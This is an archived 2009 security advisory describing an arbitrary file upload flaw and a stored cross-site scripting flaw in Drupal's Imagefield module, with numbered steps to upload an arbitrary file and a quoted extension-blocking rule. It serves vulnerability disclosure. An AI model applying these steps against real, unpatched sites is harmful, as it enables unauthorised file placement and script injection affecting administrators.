Drupal Imagefield Upload / Cross Site Scripting

2009-01-29T00:00:00
ID PACKETSTORM:74445
Type packetstorm
Reporter Andrew Rosborough
Modified 2009-01-29T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Drupal Imagefield Module Multiple Vulnerabilities  
  
Security Risk: High  
Exploitable: Remotely  
Vulnerabilities: Arbitrary File Upload, Cross Site Scripting  
Discovered by: Justin C. Klein Keane, Andrew Rosborough  
Tested: Imagefield 5.x-2.2 on Drupal 5.15  
  
Description  
  
Drupal (http://drupal.org) is a robust content management system (CMS)  
that provides extensibility through hundreds of third party modules.  
While the security of Drupal core modules is vetted by a central  
security team(http://drupal.org/security), third party modules are not  
reviewed for security.  
  
The Imagefield module (http://drupal.org/project/imagefield) is a module  
that extends the Drupal CCK (Content Creation Kit) module  
(http://www.drupal.org/project/cck) by allowing users to add image  
fields to custom content types.  
  
  
Arbitrary File Upload Vulnerability  
  
Two flaws exist in this module. The first flaw allows for an attacker  
to upload arbitrary files to the filesystem. The vulnerability allows  
attackers to upload arbitrary files in place of the 'Default image'  
specified in the Imagefield specifications for a content type field.  
Files are uploaded to Drupal's /files/imagefield_default_files/  
directory on a default installation (with files specified as the default  
upload directory through Drupal's administrative configuration - this  
may vary).  
  
Mitigating Factors  
  
Attackers must be authenticated with an account that has 'administer  
content types' permissions. Additionally, Drupal protects the files  
directory, and subdirectories with an .htaccess file located in the  
files directory that specifies:  
  
SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006  
Options None  
Options +FollowSymLinks  
  
This will prevent the direct execution of PHP files. Additionally  
Drupal's file_check_upload() function munges the file extensions that  
match PHP, PL, PY, CGI, ASP, and JS with the following code:  
  
// Rename potentially executable files, to help prevent exploits.  
if (preg_match('/\.(php|pl|py|cgi|asp|js)$/i', $file->filename) &&  
(substr($file->filename, -4) != '.txt')) {  
$file->filemime = 'text/plain';  
$file->filepath .= '.txt';  
$file->filename .= '.txt';  
}  
  
Exploiting the File Upload Vulnerability  
  
To exploit the vulnerability:  
  
1. Log in as a user with 'Administer content types' privilege  
2. Click Administer -> Content Types  
3. Click 'Add content type'  
4. Fill in required text in the Identification, Submission and other  
fieldsets  
5. Click 'Save content type' button  
6. Click 'edit' under the Operations column on the 'Administer' ->  
'Content management' screen for the new content type  
7. Click 'Add field'  
8. Fill in the 'Name' text box in the 'Create new field' fieldset and  
select the 'Image' radio button  
9. Click the 'Create field' button  
10. In the next screen (assuming the new field was named 'test' and the  
new type was named 'test' this will be in Home > Administer > Content  
management > Content types > test) scroll down to the 'Data settings'  
fieldset  
11. Click the 'Browse' button in the 'Default image' fieldset and  
select a file from your filesystem.  
12. Click 'Save field settings' button  
13. Log into your server and do a directory listing of the upload  
directory to verify the new file has been uploaded.  
  
# cd /var/www/html/drupal-5.15/files/imagefield_default_images/  
# ls  
- - -rw-rw-r-- 1 apache apache 18 2009-01-22 10:22 field_test_0.exe  
  
14. Browse to the file (assuming Drupal is running at the doc root):  
http://192.168.0.50/files/imagefield_default_images/field_test_0.exe  
  
Cross Site Scripting (XSS) Vulnerability  
  
The Imagefield module also contains a XSS vulnerability in the 'Help'  
field. Any user with rights to administer content types can edit a  
content type that contains an image field or create a content type that  
contains an image field. In the 'Widget settings' fieldset presented  
during configuration of the specific image field a textarea labeled  
'Help text:' is presented. Arbitrary script can be entered into this  
text area and it is not escaped. This vulnerability is especially  
dangerous because the script executes whenever a user creates new  
content of the type with the XSS infected help text. This potentially  
exposes site administrators to the XSS attack.  
  
- --  
Justin C. Klein Keane  
http://www.MadIrish.net  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.7 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iQD1AwUBSYG6EZEpbGy7DdYAAQJChgb+LUEHPrQ1GboCjvl7aKeUx7KRtu56IBnj  
txM6pKTjBNI42iaTIKnMK+acBtcoN5TJhtyMsrOfjaLEFsjT08Sc0WQKk8H8LAMw  
rb9qWO1L01MqnbyByUZSDltyV9BI4z5dI8ekjowsL6KcrZfGPCumBt8m+FuzxPLX  
vXQ+huGZQihq3lmmbdd0gc83f6hvIG6MADha6yutv1tY0H0Y1B06ZAkizh+LUvhu  
mY3u6LrIWZqnZr/NRAcsX09q+4AHp+3w8va/8kx7EixzkiWK8NwXGLL+MWatT5sq  
zv/ZgrnspW4=  
=zBEx  
-----END PGP SIGNATURE-----  
  
`